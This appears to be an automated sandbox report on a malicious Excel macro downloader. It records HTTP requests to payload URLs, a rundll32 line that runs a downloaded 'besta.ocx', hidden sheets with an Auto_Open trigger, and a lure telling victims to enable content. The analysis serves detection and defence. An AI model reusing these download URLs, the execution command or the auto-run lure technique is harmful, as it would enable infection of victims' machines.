    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/elementor/css/post-1522.css?ver=1638212153
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/elementor/css/post-2017.css?ver=1638212282
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/elementor/css/post-2157.css?ver=1638212282
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/elementor/css/post-5.css?ver=1637592550
    Source: EXCEL.EXE, 00000001.00000003.382012892.0000000015A33000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/images/caso-exito1.png
    Source: EXCEL.EXE, 00000001.00000003.382012892.0000000015A33000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/images/comentario1.jpg
    Source: EXCEL.EXE, 00000001.00000003.382012892.0000000015A33000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/images/comentario5-m.jpg
    Source: EXCEL.EXE, 00000001.00000003.382012892.0000000015A33000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/images/comentario6.jpg
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-includes/css/dist/block-library/style.min.css?ver=5.8.2
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-includes/js/imagesloaded.min.js?ver=4.1.4
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-includes/js/jquery/jquery.min.js?ver=3.6.0
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-includes/js/jquery/ui/core.min.js?ver=1.12.1
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-includes/js/wp-embed.min.js?ver=5.8.2
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-includes/wlwmanifest.xml
    Source: EXCEL.EXE, 00000001.00000003.456181279.000000001307F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382185365.0000000015AE1000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421917396.0000000013079000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491626007.000000001307F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.384326864.000000001307E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.384312092.0000000013079000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461632649.0000000013079000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.435017611.0000000013079000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.433424228.0000000015AD1000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421150549.0000000015AD7000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491604378.0000000013079000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456171717.0000000013079000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439337436.0000000013079000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580947514.0000000013079000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-json/
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fvendes.marketing%2F
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fvendes.marketing%2F&#038;format=
    Source: EXCEL.EXE, 00000001.00000003.456181279.000000001307F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382185365.0000000015AE1000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491626007.000000001307F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.384326864.000000001307E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.433424228.0000000015AD1000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421150549.0000000015AD7000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-json/wp/v2/pages/1522
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/xmlrpc.php?rsd
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devicesUserVoiceWordIOShttps://word.uservoice.com
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmpString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/z3
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://webshell.suite.office.com
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmpString found in binary or memory: https://webshell.suite.office.comE
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://wus2.contentsync.
    Source: EXCEL.EXE, 00000001.00000002.579794121.0000000012E6D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://wus2.pagecontentsync.
    Source: EXCEL.EXE, 00000001.00000003.382474617.000000001301A000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439243495.000000001301A000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434833888.0000000013019000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421041076.0000000013019000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494384383.000000001301A000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.282412041.000000001301E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461524519.000000001301A000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580829333.000000001301A000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456076552.000000001301A000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.422155036.0000000013019000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2Azur
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://www.odwebp.svc.ms
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpString found in binary or memory: https://www.odwebp.svc.mst.FP
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://www.thinkwithgoogle.com/intl/es-419/futuro-del-marketing/transformacion-digital/tiendas-omni
    Source: BX1IWYL9.htm.1.drString found in binary or memory: https://www.thinkwithgoogle.com/intl/es-419/insights/tendencias-de-consumo/6-certezas-sobre-el-nuevo
    Source: unknownDNS traffic detected: queries for: standoutglobal.com
    Source: global trafficHTTP traffic detected: GET /2/MWpqeVgZ/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: standoutglobal.com
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: vendes.marketing
    Source: global trafficHTTP traffic detected: GET /2/MWpqeVgZ/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: standoutglobal.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /transmigrant/Wplzr/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: vendes.marketingConnection: Keep-Alive
    Source: unknownHTTPS traffic detected: 162.240.9.126:443 -> 192.168.2.3:49745 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.180.46.229:443 -> 192.168.2.3:49747 version: TLS 1.2

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled editing, please click "Enable Content
    Source: Screenshot number: 4Screenshot OCR: protected documents. 4 CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled editin
    Source: Screenshot number: 4Screenshot OCR: Enable Content" button 6 7 8 9 10 11 12 13 14 15 16 1'7 T U V W r 18 19 20 1 G
    Source: Screenshot number: 8Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled editing, please click "Enable Content
    Source: Screenshot number: 8Screenshot OCR: protected documents 4 CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled editing
    Source: Screenshot number: 8Screenshot OCR: Enable Content" button 6 7 ' O 9 10 11 12 13 14 15 16 1'7 N , O , P , Q , R , S T U V
    Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, please click "Enable Content"
    Source: Document image extraction number: 0Screenshot OCR: protected documents. CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, p
    Source: Document image extraction number: 0Screenshot OCR: Enable Content" button
    Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, please click "Enable Content'
    Source: Document image extraction number: 1Screenshot OCR: protected documents. CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, p
    Source: Document image extraction number: 1Screenshot OCR: Enable Content' button
    Source: CU-6431 report.xlsmMacro extractor: Sheet name: Buk2
    Source: CU-6431 report.xlsmMacro extractor: Sheet name: Buk5
    Source: CU-6431 report.xlsmMacro extractor: Sheet name: Buk1
    Source: CU-6431 report.xlsmMacro extractor: Sheet name: Buk7
    Source: CU-6431 report.xlsmMacro extractor: Sheet name: EFEWF
    Source: CU-6431 report.xlsmMacro extractor: Sheet name: Buk3
    Source: CU-6431 report.xlsmMacro extractor: Sheet name: Buk4
    Source: CU-6431 report.xlsmMacro extractor: Sheet name: Buk6
    Source: workbook.xmlBinary string: \Desktop\Fil\1d\Cir\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{8197EE46-A436-4D64-BA91-0FA619A1F240}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-120" yWindow="-120" windowWidth="20730" windowHeight="11160" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="Sheet" sheetId="1" r:id="rId1"/><sheet name="Ss1" sheetId="2" state="hidden" r:id="rId2"/><sheet name="Ss1br2" sheetId="3" state="hidden" r:id="rId3"/><sheet name="Ssbr3" sheetId="4" state="hidden" r:id="rId4"/><sheet name="EFEWF" sheetId="5" state="hidden" r:id="rId5"/><sheet name="Buk1" sheetId="6" state="hidden" r:id="rId6"/><sheet name="Buk2" sheetId="7" state="hidden" r:id="rId7"/><sheet name="Buk3" sheetId="8" state="hidden" r:id="rId8"/><sheet name="Buk4" sheetId="9" state="hidden" r:id="rId9"/><sheet name="Buk5" sheetId="10" state="hidden" r:id="rId10"/><sheet name="Buk6" sheetId="11" state="hidden" r:id="rId11"/><sheet name="Buk7" sheetId="12" state="hidden" r:id="rId12"/></sheets><definedNames><definedName name="LKLW">EFEWF!$D$3</definedName><definedName name="SASA">EFEWF!$D$17</definedName><definedName name="SASA1">EFEWF!$D$19</definedName><definedName name="SASA2">EFEWF!$D$21</definedName><definedName name="_xlnm.Auto_Open">EFEWF!$D$1</definedName></definedNames><calcPr calcId="191029"/><extLst><ext uri="{B58B0392-4F1F-4190-BB64-5DF3571DCE5F}" xmlns:xcalcf="http://schemas.microsoft.com/office/spreadsheetml/2018/calcfeatures"><xcalcf:calcFeatures><xcalcf:feature name="microsoft.com:RD"/><xcalcf:feature name="microsoft.com:FV"/></xcalcf:calcFeatures></ext></extLst></workbook>
    Source: EA155E99.tmp.1.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: CU-6431 report.xlsmVirustotal: Detection: 30%
    Source: CU-6431 report.xlsmReversingLabs: Detection: 20%
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.4828778935
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.4828778935
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\System32\BackgroundTransferHost.exe "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.4828778935Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\~$CU-6431 report.xlsmJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{73545105-289A-4285-8C71-F341B9E6A3D0} - OProcSessId.datJump to behavior
    Source: classification engineClassification label: mal68.expl.winXLSM@4/7@2/2
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
    Source: C:\Windows\System32\BackgroundTransferHost.exeAutomated click: OK
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: CU-6431 report.xlsmInitial sample: OLE zip file path = xl/worksheets/sheet4.xml
    Source: CU-6431 report.xlsmInitial sample: OLE zip file path = xl/media/image1.png
    Source: CU-6431 report.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
    Source: CU-6431 report.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet3.xml.rels
    Source: CU-6431 report.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
    Source: CU-6431 report.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
    Source: CU-6431 report.xlsmInitial sample: OLE zip file path = xl/calcChain.xml
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: EA155E99.tmp.1.drInitial sample: OLE indicators vbamacros = False
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXECode function: 1_3_0F63B7C4 sldt word ptr [eax]1_3_0F63B7C4
    Source: EXCEL.EXE, 00000001.00000003.382894979.000000000F68D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.577078364.000000000D900000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.433700627.000000000F68D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420525101.000000000F68D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.577966844.000000000F68D000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
    Source: EXCEL.EXE, 00000001.00000003.382894979.000000000F68D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.433700627.000000000F68D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420525101.000000000F68D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.577966844.000000000F68D000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
    Source: EXCEL.EXE, 00000001.00000003.439000776.0000000012E9E000.00000004.00000001.sdmpBinary or memory string: hJ2oKAy8cULD4mZTt5Qocx2uhequnX4mNxDjUY8j64ciLpywHhTZibYsGPurHLpKlTSPvMNetW9Z
    Source: Yara matchFile source: app.xml, type: SAMPLE
    Source: EXCEL.EXE, 00000001.00000002.575809824.0000000002F90000.00000002.00020000.sdmpBinary or memory string: Program Manager
    Source: EXCEL.EXE, 00000001.00000002.575809824.0000000002F90000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
    Source: EXCEL.EXE, 00000001.00000002.575809824.0000000002F90000.00000002.00020000.sdmpBinary or memory string: Progman
    Source: EXCEL.EXE, 00000001.00000002.575809824.0000000002F90000.00000002.00020000.sdmpBinary or memory string: Progmanlock

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting1Path InterceptionProcess Injection2Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryVirtualization/Sandbox Evasion1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion1Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection2NTDSFile and Directory Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol14SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting1LSA SecretsSystem Information Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonRundll321Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    CU-6431 report.xlsm31%VirustotalBrowse
    CU-6431 report.xlsm20%ReversingLabsDocument-Office.Downloader.EncDoc

    Dropped Files

    No Antivirus matches

